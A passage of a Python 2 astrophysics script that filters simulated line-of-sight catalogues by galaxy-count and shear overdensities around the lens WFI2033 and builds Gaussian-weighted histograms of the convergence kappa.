constrwidth_weight1_inf = constrwidth_tidal_meds_inf; constrwidth_weight1_sup = constrwidth_tidal_meds_sup\n if weightin1 == \"SIS\": constr_weight1 = constr_SIS_meds; constrwidth_weight1_inf = constrwidth_SIS_meds_inf; constrwidth_weight1_sup = constrwidth_SIS_meds_sup\n if weightin1 == \"SIShalo\": constr_weight1 = constr_SIShalo_meds; constrwidth_weight1_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight1_sup = constrwidth_SIShalo_meds_sup\n if weightin1 == \"gamma\": constr_weight1 = constr_gamma; constrwidth_weight1_inf = constrwidth_gamma_inf; constrwidth_weight1_sup = constrwidth_gamma_sup\n\nprint \"Reading...\"\n\n#if mode == \"sum\":\n #str1 = \"\"\nif mode == \"meds\":\n str1 = \"med\"\n\nif conjoined == 4:\n output = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s_%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\nif conjoined == 3:\n output = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_%s_increments%s_%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_%s_LOS_increments%s_%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\nif conjoined == 2:\n output = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_increments%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,mag,radius,mode,increment1,increment2)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_%s_LOS_increments%s_%s.cat' % (rootout,lens,innermask,weightin1,weightin2,mag,radius,mode,increment1,increment2)\nif conjoined == 1:\n output = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_increments%s.cat' % (rootout,lens,innermask,weightin1,mag,radius,mode,increment1)\n outputLOS = '%skappahist_%s_%sinnermask_nobeta_%s_%s_%s_%s_LOS_increments%s.cat' % (rootout,lens,innermask,weightin1,mag,radius,mode,increment1)\n\nif conjoined == 1:\n ''' Here I only read the columns of interest, without kappa, for ugriz, in order to find the medians of their values over the whole MS.'''\n med1 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin1 != \"gamma\":\n weight1_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=[weight1_index], unpack=True)\n if i == 0:\n weight1 = weight1_\n else:\n weight1 = np.append(weight1,weight1_)\n else:\n weight1_1_,weight1_2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=[2,3], unpack=True)\n if i == 0:\n weight1_1 = weight1_1_\n weight1_2 = weight1_2_\n else:\n weight1_1 = np.append(weight1_1,weight1_1_)\n weight1_2 = np.append(weight1_2,weight1_2_)\n if weightin1 != \"gamma\":\n med1[j] = np.median(weight1)\n else:\n med1[j] = np.median(np.sqrt(weight1_1**2 + weight1_2**2))\n print j\n med_weight1 = np.mean(med1) # throughout the code I use med_weight1 when computing intervals, following Green et al. For this, weight1 should always refer to simple galaxy number counts\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))]) # absolute number, e.g. of galaxies within the lower width\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n if weightin1 == \"gamma\":\n constr_weight1 = constr_weight1 / med_weight1 # for gamma, measured shear divided by the median value of shear in MS; this turns it into an overdensity, like the other weights\n \n ''' Here I read ugrizJHK, converting weighted counts into overdensities, and recording the kappa values only for overdensities satisfying the constraint. I consider the full range of the constraint.'''\n for j in range(8):\n for i in range(8):\n if weightin1 != \"gamma\":\n kappa_, weight1_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n else:\n kappa_, gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = gamma / med_weight1_\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ] # convert overdensities into absolute counts\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n print j\n\nif conjoined == 2:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,weight2_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n else:\n weight1_,weight2_1_,weight2_2_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=[weight1_index,1,2], unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n print j\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight2_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n else:\n kappa_, weight1_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n print j\n\nif conjoined == 3:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,weight2_index,weight3_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,1,2,weight3_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n print j\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight2_index,weight3_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n else:\n kappa_, weight1_,weight3_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight3_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n print j\n\nif conjoined == 4:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n med4 = np.zeros(8)\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,weight2_index,weight3_index,weight4_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_ugriz_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,str(j),str(i),radius,innermask), usecols=(weight1_index,1,2,weight3_index,weight4_index), unpack=True)\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n print j\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n med_weight4 = np.mean(med4)\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n E_w4_inf = np.max([1, round(med_weight1 * (constr_weight4 - constrwidth_weight4_inf))])\n E_w4_sup = np.max([1, round(med_weight1 * (-constr_weight4 + constrwidth_weight4_sup))])\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n\n for j in range(8):\n for i in range(8):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_,weight4_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight2_index,weight3_index,weight4_index), unpack=True)\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n else:\n kappa_, weight1_,weight3_,weight4_,gamma1_,gamma2_ = np.loadtxt(\"%snobeta35measured%sinject_%s_WFI2033_GGL_los_8_%s_%s_%s_%sarcsecinnermsk.cat\" % (root,str1,filters,str(j),str(i),radius,innermask), usecols=(1,weight1_index,weight3_index,weight4_index,2,3), unpack=True)\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n weight = np.copy(weight1_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n print j\n\nprint(\" Read in %s seconds\" % (time.time() - start_time))\n\ngauss = sp.stats.norm(0, 1)\nstart1 = time.time()\nLOS = 0\n\nif conjoined == 4:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1): # use as specific value\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n for E4 in np.arange(-limsigma * E_w4_inf, limsigma * E_w4_sup + 1, increment4):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \", \"E4 = \", E4, \"in (\", -limsigma * E_w4_inf, \",\", limsigma * E_w4_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0) & (weight4 * med_weight1 >= round(constr_weight4 * med_weight1) + E4 - increment4/2.0) & (weight4 * med_weight1 < round(constr_weight4 * med_weight1) + E4 + increment4/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n if E4 < 0: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_inf)\n else: gauss_factorE4 = gauss.pdf(float(E4)/E_w4_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 * gauss_factorE4 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 3:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \"#, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 2:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \" #, \"gauss_weight4 = \", 